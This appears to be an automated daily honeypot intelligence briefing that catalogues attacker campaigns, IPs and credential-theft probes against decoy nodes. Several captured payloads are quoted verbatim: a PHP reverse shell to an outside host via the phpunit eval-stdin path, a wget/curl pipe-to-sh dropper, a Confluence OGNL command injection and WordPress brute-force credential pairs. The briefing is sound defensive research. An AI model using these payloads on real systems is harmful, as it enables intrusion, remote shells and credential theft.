FLUX FLEET — INTEL BRIEFING №8
Period: 2026-09-02 07:32 – 2026-09-03 07:32 UTC (24h digest window, day 7 of operations)
Sources: 3 honeypot nodes — canary-farm-1 (EU-hot), ai-devbox-1 (EU), control-1 (Middle East)
Confidence: High (direct observation; 7-day baseline, every burst ≥50 events attributed by spot query)
Window overlap: this digest window overlaps №5's by ~11.6 h (07:32–19:10 UTC on 09-02). Events in that slice appeared in both briefings. The genuinely new data is 19:10 UTC 09-02 through 07:32 UTC 09-03. All times are UTC.
BLUF
Mint output set a fleet record: 66 /.env canaries issued to 32 distinct IPs (all-time count now 305). Two new campaigns opened. BUCKLOG-KIT ran a credential sweep with live phpunit RCE exploitation on two nodes, and its payload calls back to an operator-owned host at 185.177.72.3:20116 — the first fleet-observed RCE attempt with its own C2 endpoint, distinct from RCE-SWARM's shared dropper. WP-LOGIN-BRUTE hit the farm from 7 IPs in rotating one-second bursts with recycled admin/editor credential pairs. LeakIX is now the dominant REGISTRY-HUNT operator: 29 rotating DigitalOcean IPs, 1,446 events, 17 mints, and it added Docker-registry enumeration and git-internals walks to its template. Control-1 volume fell 76% against the 7-day average. The cause is the 24,100-event burst from 08-31 aging out of the baseline, not a discovery slowdown: unique IPs held at 105.
Key Judgements
- BUCKLOG-KIT is the first actor to attempt full RCE with its own callback infrastructure. 185.177.72.66 (ai-devbox-1) and 185.177.72.53 (control-1) ran matching journeys. The aidev runner POSTed a phpunit verify payload, then a reverse shell to
185.177.72.3:20116. Both runners sit in the same /24 as that callback host (Bucklog SARL, FR;ipsum:1on .66). (High confidence — both POST bodies captured verbatim; the callback IP and both source IPs share the /24) - The XMLRPC-BRUTE scheduler held its cadence for a second day. 185.19.40.40 ran two 1,000-POST bursts on the farm at 05:16:40 and 18:25:22, 13 h 09 m apart. No third burst arrived by the 07:32 digest horizon. The next burst is due near 07:35 UTC on 09-03, minutes after this window closed. (High confidence — burst timestamps verified against raw log strings)
- 130.211.73.106 (Google LLC, BE) is the highest-intensity single-IP actor the fleet has recorded: 711 events, 131 trap families, in 7 seconds. It forged AI-crawler UAs (GPTBot/1.4, Claude-User/1.0, Perplexity-User/1.0, GrokBot/1.0, Applebot/0.1) against the aidev AI surface. It took 1 mint, then its 12 rapid
/.envretries all failed with upstream 400s. This extends METADATA-HUNT into the AI-credential theme the aidev node was built for. (High confidence — journey, UA set, and mint verified by direct query) - Control-1's discovery velocity has plateaued at 105–108 unique IPs/day for three days. The ramp reads 39 → 70 → 88 → 107 → 105 → 105. The −76% event delta is a baseline artifact. The fresh-IP differential now measures steady-state internet background. (Moderate confidence — three-day plateau; the long-term dataset continues)
Active Campaigns (day 7 status)
⚠ NEW BUCKLOG-KIT (Bucklog SARL /24) — hostile, active on 2 nodes
-
Actors: 185.177.72.66 (ai-devbox-1, 315 events, 182 paths, 36 families,
ipsum:1) and 185.177.72.53 (control-1, 226 events, 137 paths, 31 families). Both Bucklog SARL, FR. The reverse-shell target 185.177.72.3 sits in the same /24. -
TTPs: GravitySMTP mock-data probe, then an AWS/credentials wordlist (
/aws-credentials.json,/aws_credentials.json,/.aws/credentials,/config/aws.env,/application.yml,/.env~,/.env.tmp,/env.save.bak). NextAuth surface walk: POSTs to/api/auth,/api/auth/callback,/api/auth/session,/__nextjs_action, with multipart body["$1:aa:aa"]. The aidev runner then POSTed to/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php, first the verify body<?php echo md5('phpunit_rce'); ?>, then:<?php set_time_limit(120);$s=fsockopen("185.177.72.3",20116);if($s){$p=proc_open("/bin/sh -i",array(0=>$s,1=>$s,2=>$s),$pipes);while(!feof($s))usleep(100000);} ?>The aidev runner also POSTed
{"user":"admin","password":"admin"}to/login. UAs:curl/8.7.1plus one forged Windows Chrome string. -
Assessment: This kit wants credentials first and a shell second. The callback host inside the source /24 is a self-owned infrastructure error that hands us attribution. CVE-2017-9841 exploitation against a non-existent phpunit install, so no execution occurred. Zero callbacks observed. Watch the /24 for rotation; the pattern (Bucklog .53 → .66 within 3 h) suggests a pool.
⚠ NEW WP-LOGIN-BRUTE (7-IP distributed brute) — hostile, farm only, cadence unknown
- Actors: 195.85.207.182, 143.95.209.25, 102.212.104.164, 192.250.234.71, 143.20.49.72, 64.227.168.172, 58.6.240.146. Mixed hosting (DigitalOcean, unknown IN/PH ranges). Each IP: exactly 3 events, one burst under 1 second, spaced 30–90 minutes apart, 04:28–07:22 UTC on 09-03.
- TTPs: One GET
/wp-login.phpprobe, then two credential POSTs per IP. Identical forged UA on all seven:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/151.0.0.0 Safari/537.36. Captured bodies, verbatim:log=editor&pwd=editor,log=admin&pwd=admin,log=admin&pwd=admin%40123,log=admin&pwd=Admin,log=editor&pwd=editor123. - Assessment: A distributed low-and-slow credential brute against the WordPress surface. One guess pair per IP keeps per-IP volume invisible to rate limits. All 21 events are new-slice data (after 19:10 UTC). No mints. Watch for continuation past one day and for the target list widening to aidev.
⟳ RCE-SWARM / libredtail kit — hostile, growing, fleet-wide
- Actors: 30 source IPs all-time, 1,271 events, day 7 of activity. This window held six runs: 217.160.171.212 and 103.205.107.170 (aidev, 09-02), 103.118.29.32 (control, 09-02), and three new IPs — 82.39.154.137 (aidev, 20:08), 104.168.112.143 (aidev, 46 events, 01:00), 223.123.65.54 (control, 02:45).
- TTPs: Unchanged fixed kit: phpunit
eval-stdin.phpwith<?php echo(md5("Hello PHPUnit")); ?>, PHP-CGI/bin/shtraversal,/hello.worldRCE, then the dropper fetch, captured verbatim:(wget --no-check-certificate -qO- https://217.60.195.113/sh || curl -sk https://217.60.195.113/sh) | sh -s apache. The 223.123.65.54 run also POSTed a base64 SSH-key exfiltration chain through the same paths. - Assessment: Three new source IPs in one day is the kit's fastest rotation yet. The 217.60.195.113 payload host enters day 8 with zero callbacks. The kit's commodity status is confirmed: source IPs rotate hourly, payload infrastructure stays fixed.
⟳ REGISTRY-HUNT — operator confirmed: LeakIX, at scale
- Actors: 29 rotating DigitalOcean IPs this window (159.89.12.166, 165.227.39.235, 138.68.86.32, 164.90.228.79, 209.38.208.202, 146.190.242.161, 164.92.107.174, 143.244.168.161, 46.101.111.185, and 20 more), plus
l9explore/1.2.2from 193.32.204.199 (Madina IT, TR). 1,446 events, 17 mints. Two waves: 15:12–15:20 and 19:14–21:24 UTC. - TTPs: The fixed 36-path journey now includes the full Docker-registry enumeration (
/v2/_catalog,/v2/internal/api-gateway/tags/list,/v2/internal/api-gateway/manifests/latest) and a git-internals walk. Each IP runs the identicall9scanUA template and takes exactly 1 mint. Thel9exploretool (193.32.204.199) walked.git/configinternals on farm (100 events) and control (50 events). - Assessment: The digest's new signature cluster
76d212a95300(9 IPs, 351 events, aidev) is this wave. Registry entryREGISTRY-HUNT: operator identified day 6 (LeakIX)is now the confirmed primary operator, not one actor among several. Borderline-benign, but it collected 17 mints in one window — the fleet's largest single collector group.
⟳ OMEGA-SWEEP (Omegatech /24) — hostile, no new IPs this window
- Actors: 94.154.46.249 (farm, 2,100 events, 13:07) and 94.154.46.248 (aidev, 1,390 events, 12:43) — both in the overlap slice, already reported in №5. The second range (130.12.180.77) did not return.
- TTPs: Forged Googlebot UA, 93–107-family credential census in a single minute, SaaS/AI/cloud paths.
- Assessment: 21 mints from the pair this window. No fifth /24 IP on day 7; the pool likely holds exactly four. This window adds no new actor data.
⟳ METADATA-HUNT (GCP, forged AI-crawler UAs) — hostile, escalated
- Actors: 130.211.73.106 (Google LLC, BE). Single burst 23:00:16–23:00:23 on 09-02: 711 events, 131 trap families, 12 POSTs.
- TTPs: The Vite/IMDS template (
/__aws_leak_probe_dc587bde__,/@fs/proc/1/environ,/@vite/env,/@fs/home/ec2-user/.aws/credentials,/.mcp.json), plus cloud and AI credential paths. UA rotation forged eight AI-crawler brands: GPTBot/1.4, Claude-User/1.0, Perplexity-User/1.0, GrokBot/1.0, Applebot/0.1, Google-Extended/1.0, facebookexternalhit/1.1, Slackbot-LinkExpanding/1.0. One/.envmint succeeded; 12 retries in the same second all returned upstream 400s. - Assessment: The forged AI-crawler UA set is new tooling aimed at the aidev profile. The 400 retries match the known upstream rejection pattern from scanner request shapes. Day-2's Google Cloud xmlrpc runner (34.63.40.186) suggests GCP is a recurring source; watch for recurrence from another GCP IP.
⟳ CREDSWEEP (Feo Prest /24) — hostile, standing, new OAST probe
- Actors: 213.209.159.148 (Feo Prest SRL, DE), control-1, 229 events, 05:21–05:22, 36 families, 2 mints. The /24 rotates: .154 (№7), .148 (this window).
- TTPs: Rotating eight-UA browser set over the
.env-variant wordlist, plus a new Confluence OGNL RCE probe with an OAST canary, verbatim:/${@java.lang.Runtime@getRuntime().exec("nslookup da4ghb4upag7j4i9qnqgqz3wwt37mssb7.oast.me")}/(three variants of the subdomain). Also+CSCOE+/logon.html(Cisco WebVPN),.aws/.azurecredential files with malformed variants (/.aws/config;,/.aws/config\u{FFFD}). - Assessment: The OAST probe means the operator confirms RCE outcomes out-of-band. No execution occurred, but the OAST domain (
da4ghb4upag7j4i9qnqg*.oast.me) is now a search indicator for this actor anywhere in the fleet.
Standing actors (persistence check)
- Pfcloud UG (204.76.203.18,
ipsum:2, NL) — day 7 of continuous control recon, 1,318 events, 560 distinct paths, empty UA, zero POSTs. Volume fell from ~2,000/day to 1,318 in this window; the path census holds steady. Fixed-census service, not escalating. - 194.180.49.37 (Go-http-client) — minted on all three nodes in one window (farm 22:35, control 00:33, aidev 00:56), 19 mints all-time over 6 days. Still the most persistent single-IP mint collector, now the first to touch every node in one day.
- Jio fuzzer (49.43.3.194, Reliance Jio, IN) — day 2. 1,308 events on aidev, 1,305 distinct paths,
curl/8.21.0, 1,152 of them/config/config/...recursion at 13:51–13:56, 1 mint. Promote to standing if it returns a third day. - 23.165.56.117 (Infocrest Systems LLC, US) — ⚠ new kill-chain-grade actor. 509 events across both EU nodes (aidev 275, farm 234), 22 trap families, 16 rotating stale-browser UAs, 6 mints (3 per node), 45 POSTs. Journey mixes tarpit cycling, wp-batch multiplex (
{"requests": [{"method": "POST", "path": "///"}, ...), webapp form logins, yii2-debug, and config-bundle enumeration. Multi-hour session 22:56–05:15. Watch for recurrence; candidate for a named campaign on a second appearance. - 91.92.41.55 / 2.58.14.186 — 2 aidev mints each this window, stale Chrome/81 UAs. Day 3 and day 7 respectively. Low-volume mint collectors, standing.
- 80.94.95.211 (SS-Net, RO) — farm 171 events, 1 mint, 06:18 (overlap slice). Day 7 of SS-NET TOOLING presence.
- 192.253.248.173 (Limited Network LTD) — did not return after its 09-02 11:37 burst (overlap slice in this window). Single appearance; keep on watch.
Benign / research (not hostile)
- WanScannerBot/1.0 — ⚠ new honest-UA prober: one 2-event
/tarpit touch per node (151.240.94.47 farm, 45.157.112.102 aidev, 151.241.122.61 control). Add to the benign list pending deeper journeys. - GenomeCrawlerd/1.0 (Nokia-branded UA, 62.210.142.169, Scaleway range) — 7 events, farm,
/tarpit only. Unknown operator, honest UA, shallow. Benign-observed; not confirmed benign. - CensysInspect/1.1 — farm, single probe of a random-looking path
/z5lb7ogxrqvhx36nxt(66.132.172.216). Known research scanner; the path probe is inventory behavior. - 80.82.77.202 / 93.174.93.12 — the fixed-cadence
/-handshake prober pair, unchanged (86 and 145 events across 3 nodes). - Cloud noise floor — the digest's 45-IP
3e1c5eb879e7cluster is single-probe/tarpit touches from Tencent, GCP, Azure, and bulletproof ranges.
Fleet Observations
- Canary economics: 66 mints (aidev 29 / farm 28 / control 9) from 32 IPs, all type
["aws"], a fleet daily record. All-time issued: 305. Mint failures: 31 × 400 (aidev 24, farm 7), zero 401s. All 31 cluster in 20:24–23:00 UTC on 09-02: 12 from 130.211.73.106's rapid/.envretries, the rest one each from LeakIX wave IPs mid-journey. Root cause unchanged: upstream Tracebit rejection tied to scanner request patterns, not key state. Callbacks remain the attribution breakthrough we are waiting for; BUCKLOG-KIT's185.177.72.3:20116is the first operator-owned callback endpoint the fleet has captured at all. - XFF forgery: 0 multi-entry chains, 0 empty-clientIp rows — sixth consecutive clean day post-fix. 1,509 requests carried single-entry XFF.
- TLS/attribution posture: farm 495 https events against 2,958
sso.rightabouteverything.showHost events; aidev 532 https against 978inference.fapthropic.com. Control stays deliberately certless (http only). Both TLS identities hold traffic above their plain-IP Host shares; the attribution design keeps validating. - Volume: digest window totals 13,669 events (farm 5,875 / aidev 5,433 / control 2,361). Farm +16% and aidev +23% vs the 7-day average come from the record mint day and the LeakIX evening wave. Control −76% is the 08-31 24,100-event burst aging out of the baseline. Every hour ≥50 events is attributed: farm 05:00 and 18:00 = the two 1337 replays, farm 13:00 = Omegatech .249, aidev 12:00 = Omegatech .248, aidev 13:00 = Jio recursion, aidev 23:00 = 130.211.73.106, aidev 06:00 (09-03) = Bucklog .66, control 05:00 (09-03) = 213.209.159.148, control 03:00 = Bucklog .53.
- Spike attribution (all causes found): docker-registry-tags/manifest 90+90 on both EU nodes = the LeakIX 17-IP registry walk; fake-git aidev 185 = Jio 144 + Omegatech 14 + floor; fake-git farm 175 = l9explore 98 + Omegatech 34 + 216.81.248.56 (24); control fake-git 57 = l9explore 49; whm-login, graphql-introspection, server-status, ds-store, sftp-config, wp-user-enum on both EU nodes = the shared 17–18-IP waves (LeakIX plus floor); aidev aws-credentials-file-error 28 = Bucklog .66. No unexplained spike remains.
- First-seen inventory (not a timeline): new paths resolve to Bucklog .66's wordlist (
/env.save.bak,/keys.env,/.aws/secret_credentials.json,/aws-keys.txt), Feo Prest.git/configvariants, and the Censys random-path probe. New UAs: WanScannerBot, GenomeCrawlerd, and the forged iPhone/Mac/Windows strings from 130.211.73.106, 213.209.159.148, and 23.165.56.117 rotations. - Cross-node reuse: 19 IPs on 2+ sensors. Hostile: 23.165.56.117 (509, both EU nodes, 6 mints), LeakIX runners (80 events each on 4 IPs), 193.32.204.199 (152, farm + control). Benign/shallow: the aiohttp pair, 165.232.84.100 (18), 194.180.49.37 (3, all nodes, all mints).
- Infrastructure: no fleet-side changes this cycle.
- Digest quirks applied: the +4 h timestamp cast, single-writer DuckDB lock, and sync-arrival first-seen stamps all re-confirmed. Spot queries ran with CUTOFF widened to 07:00 UTC to cover the cast offset.
Gaps / Next Collection
- 1337 burst scheduler — the third 1,000-POST run is due near 07:35 UTC on 09-03, minutes past this digest horizon. A confirmed third interval locks the cadence and lets tarpit budget be pre-allocated. Top watch item.
- BUCKLOG-KIT C2 — 185.177.72.3:20116 is the first operator-owned callback endpoint captured. Any TCP hit on that host:port is the attribution breakthrough. Watch the 185.177.72.0/24 for source-IP rotation and callback traffic.
- WP-LOGIN-BRUTE continuation — one day of 7-IP distributed brute is a sample of one. If it recurs with new IPs and new credential pairs, it graduates to a standing campaign with a measurable wordlist.
- 23.165.56.117 (Infocrest) — 6 mints across both EU nodes in one session. A second appearance promotes it to a named campaign. Check whether the wp-batch multiplex bodies link it to the WP-BATCH kit's author.
- 217.60.195.113 payload host — day 8, 30 source IPs, zero callbacks. Passive DNS / threat-intel lookup still open (carried №6–№8).
- 130.211.73.106 recurrence — forged AI-crawler UA rotation from GCP against the aidev profile. One burst is new tooling; a second from a different GCP IP is a pattern.
Generated on medina (headless systemd run). Digest: /data/flux-logs/reports/flux-digest-2026-09-03.md. Spot queries: flux-query.sh fleet-24h (nominal + widened CUTOFF), crossnode-reuse, mint-health, mint-collectors, ip-journey (213.209.159.148, 23.165.56.117, 130.211.73.106, 185.177.72.66, 185.19.40.40), plus 25 ad-hoc v_full queries (POST census, spike attribution, libredtail census, LeakIX wave, wp-login cluster, xmlrpc timing) and raw-log verification of the 1337 burst boundaries.